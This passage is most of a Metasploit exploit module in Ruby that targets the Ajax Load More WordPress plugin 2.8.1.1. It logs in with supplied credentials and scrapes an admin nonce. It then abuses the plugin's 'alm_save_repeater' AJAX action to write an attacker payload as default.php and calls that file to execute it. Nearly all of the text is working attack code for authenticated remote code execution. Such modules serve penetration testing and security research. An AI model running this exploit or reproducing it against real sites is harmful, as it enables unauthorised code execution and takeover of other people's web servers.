        2.8.0 with Wordpress 4.1.3 on Ubuntu 12.04/14.04 Server.
      },
      'Author'         =>
        [
          'Unknown', # Identify yourself || send an PR here
          'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['WPVDB', '8209']
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Ajax Load More 2.8.1.1', {}]],
      'DisclosureDate' => 'Oct 10 2015',
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('WP_USERNAME', [true, 'A valid username', nil]),
        OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil])
      ], self.class
    )
  end

  def check
    check_plugin_version_from_readme('ajax-load-more', '2.8.1.2')
  end

  def username
    datastore['WP_USERNAME']
  end

  def password
    datastore['WP_PASSWORD']
  end

  def get_nonce(cookie)
    res = send_request_cgi(
      'method'   => 'GET',
      'uri'      => normalize_uri(wordpress_url_backend, 'admin.php'),
      'vars_get' => {
        'page' => 'ajax-load-more-repeaters'
      },
      'cookie'   => cookie
    )

    if res && res.body && res.body =~ /php","alm_admin_nonce":"([a-z0-9]+)"}/
      return Regexp.last_match[1]
    else
      return nil
    end
  end

  def exploit
    vprint_status("#{peer} - Trying to login as #{username}")
    cookie = wordpress_login(username, password)
    fail_with(Failure::NoAccess, "#{peer} - Unable to login as: #{username}") if cookie.nil?

    vprint_status("#{peer} - Trying to get nonce")
    nonce = get_nonce(cookie)
    fail_with(Failure::Unknown, "#{peer} - Unable to get nonce") if nonce.nil?

    vprint_status("#{peer} - Trying to upload payload")

    # This must be default.php
    filename = 'default.php'

    print_status("#{peer} - Uploading payload")
    res = send_request_cgi(
      'method'    => 'POST',
      'uri'       => normalize_uri(wordpress_url_backend, 'admin-ajax.php'),
      'vars_post' => {
        'action'   => 'alm_save_repeater',
        'value'    => payload.encoded,
        'repeater' => 'default',
        'type'     => 'default',
        'alias'    => '',
        'nonce'    => nonce
      },
      'cookie'    => cookie
    )

    if res
      if res.code == 200 && res.body.include?('Template Saved Successfully')
        register_files_for_cleanup(filename)
      else
        fail_with(Failure::Unknown, "#{peer} - You do not have sufficient permissions to access this page.")
      end
    else
      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
    end

    print_status("#{peer} - Calling uploaded file")
    send_request_cgi(
      'uri' => normalize_uri(wordpress_url_plugins, 'ajax-load-more', 'core', 'repeater', filename)
    )
  end
end